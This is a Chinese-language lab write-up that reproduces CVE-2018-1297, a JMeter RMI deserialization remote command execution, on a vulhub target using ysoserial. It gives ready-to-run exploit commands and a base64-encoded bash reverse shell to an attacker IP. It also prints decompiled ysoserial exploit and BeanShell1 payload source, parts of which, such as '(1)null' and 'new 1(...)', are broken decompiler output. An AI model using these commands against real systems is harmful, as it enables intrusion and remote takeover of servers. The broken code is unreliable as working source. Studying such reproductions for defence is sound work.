Jmeter RMI 反序列化命令执行漏洞复现

工具下载

ysoserial

wget https://github.com/frohoff/ysoserial/releases/tag/v0.0.6/ysoserial-all.jar 

漏洞复现

靶场：vulhub—jmeter/CVE-2018-1297/
通过命令sudo docker-compose config可以看到，环境开启后将启动RMI服务并监听1099端口，我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 靶机IP 目标端口 BeanShell1 '待执行命令'

反弹shell连接：

将该命令进行base64编码 --------> bash -i >& /dev/tcp/攻击机IP/任意端口 0>&1

执行该命令 -------->java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 靶机IP 目标端口 BeanShell1 'bash -c {echo,base64编码}|{base64,-d}|{bash,-i}'

漏洞原理分析

https://www.anquanke.com/post/id/197829#h3-5
https://xz.aliyun.com/t/2223

脚本分析

针对目标主机地址及端口的RMI Registry建立远程连接（RMI—使用Java远程消息交换协议JRMP（Java Remote Messaging Protocol）进行通信），连接成功后提交执行用户选择的 payload

RMIRegistryExploit

package ysoserial.exploit;

import java.rmi.ConnectIOException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.secmgr.ExecCheckingSecurityManager;

public class RMIRegistryExploit {
    
    public RMIRegistryExploit() {
    
    }

    public static void main(String[] args) throws Exception {
    
        String host = args[0];
        int port = Integer.parseInt(args[1]);
        String command = args[3];
        Registry registry = LocateRegistry.getRegistry(host, port);
        String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
        Class<? extends ObjectPayload> payloadClass = Class.forName(className);

        try {
    
            registry.list();
        } catch (ConnectIOException var8) {
    
            registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory((1)null));
        }

        exploit(registry, payloadClass, command);
    }

    public static void exploit(Registry registry, Class<? extends ObjectPayload> payloadClass, String command) throws Exception {
    
        (new ExecCheckingSecurityManager()).callWrapped(new 1(payloadClass, command, registry));
    }
}

BeanShell1

根据输入命令转化为对应序列化内容，然后将消息发送

package ysoserial.payloads;

import bsh.Interpreter;
import bsh.XThis;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;
import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

@Dependencies({
    "org.beanshell:bsh:2.0b5"})
@Authors({
    "pwntester", "cschneider4711"})
public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
    
    public BeanShell1() {
    
    }

    public PriorityQueue getObject(String command) throws Exception {
    
        String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" + Strings.join(Arrays.asList(command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"").split(" ")), ",", "\"", "\"") + "}).start();return new Integer(1);}";
        Interpreter i = new Interpreter();
        i.eval(payload);
        XThis xt = new XThis(i.getNameSpace(), i);
        InvocationHandler handler = (InvocationHandler)Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
        Comparator comparator = (Comparator)Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{
    Comparator.class}, handler);
        PriorityQueue<Object> priorityQueue = new PriorityQueue(2, comparator);
        Object[] queue = new Object[]{
    1, 1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);
        return priorityQueue;
    }

    public static void main(String[] args) throws Exception {
    
        PayloadRunner.run(BeanShell1.class, args);
    }
}